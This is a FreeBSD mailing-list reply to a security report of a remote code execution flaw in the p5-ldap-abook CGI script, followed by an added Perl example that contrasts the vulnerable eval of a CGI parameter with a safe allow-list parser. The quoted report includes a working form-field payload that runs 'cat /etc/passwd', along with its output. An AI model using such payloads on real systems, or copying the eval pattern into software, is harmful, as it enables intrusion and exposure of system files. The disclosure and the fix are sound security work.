From: "Simon L. Nielsen" <simon@eddie.nitro.dk>
To: Roman Mashirov
Cc: ports@FreeBSD.org, security@FreeBSD.org
Date: Fri, 18 Nov 2005 11:17:47 +0100
Subject: Re: FreeBSD Port: p5-ldap-abook-1.00
Message-ID: <20051118101746.GB98443@eddie.nitro.dk>
In-Reply-To: <437DA508.8070409@mrj.spb.ru>
List: freebsd-ports (Porting software to FreeBSD)

On 2005.11.18 12:55:20 +0300, Roman Mashirov wrote:
> This CGI script contains a remote code exec. In the following code (line 128):
>
>     my $attr = eval $query->param(entry);
>
> the script directly evaluates a CGI parameter received from the client, so
> type=hidden name=entry value="system 'cat /etc/passwd';"> leads to the
> following output from the script:
>
> # $FreeBSD: src/etc/master.passwd,v 1.39 2004/08/01 21:33:47 markm Exp $
> # root:*:0:0:Charlie &:/root:/bin/csh

Yay! :-/

Have you tried to exploit it and verified that this exploit works? (I don't see any input checking from a quick check, but I cannot check before tonight CET.)

-- 
Simon L. Nielsen
FreeBSD Security Team

[PGP signature removed]
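An added example, not code from the p5-ldap-abook port or from either mail: the reported pattern (eval of an untrusted CGI parameter) beside a replacement that parses the "entry" value as plain key=value lines against a fixed attribute list and never evaluates it. The wire format, the field names in %ALLOWED and the sample inputs are assumptions constructed for this illustration.

```perl
#!/usr/bin/perl
# Added example (not from the port or the thread): the reported eval
# pattern next to a parser that accepts only expected address-book fields.
use strict;
use warnings;

# Hypothetical set of attributes one address-book entry may carry.
my %ALLOWED = map { $_ => 1 } qw(cn sn givenName mail telephoneNumber);

# The reported bug: whatever the client sends in "entry" runs as Perl.
# Shown for contrast only; never call this on client-supplied data.
sub entry_from_eval {
    my ($raw) = @_;
    my $attr = eval $raw;    # arbitrary code execution
    return $attr;
}

# Replacement: "key=value" pairs separated by newlines (assumed format).
# Every key must be in %ALLOWED and every value free of control bytes;
# anything else is rejected, and nothing is ever evaluated.
sub entry_from_param {
    my ($raw) = @_;
    my %attr;
    for my $line (split /\r?\n/, $raw) {
        next if $line =~ /^\s*$/;
        my ($key, $value) = $line =~ /^([A-Za-z][A-Za-z0-9]*)=(.*)$/
            or die "malformed entry line\n";
        die "unexpected attribute '$key'\n" unless $ALLOWED{$key};
        die "control characters in '$key'\n" if $value =~ /[\x00-\x1f\x7f]/;
        $attr{$key} = $value;
    }
    die "entry has no cn\n" unless exists $attr{cn};
    return \%attr;
}

# Constructed inputs: a legitimate entry, and a code-shaped value of the
# kind the report describes (system() call replaced by a harmless one).
my $good = "cn=Jane Doe\nmail=jane\@example.org\n";
my $bad  = "system 'true';";

my $safe = entry_from_param($good);
print "accepted: $_=$safe->{$_}\n" for sort keys %$safe;

my $ok = eval { entry_from_param($bad); 1 };
print "rejected: $@" unless $ok;    # "malformed entry line"
```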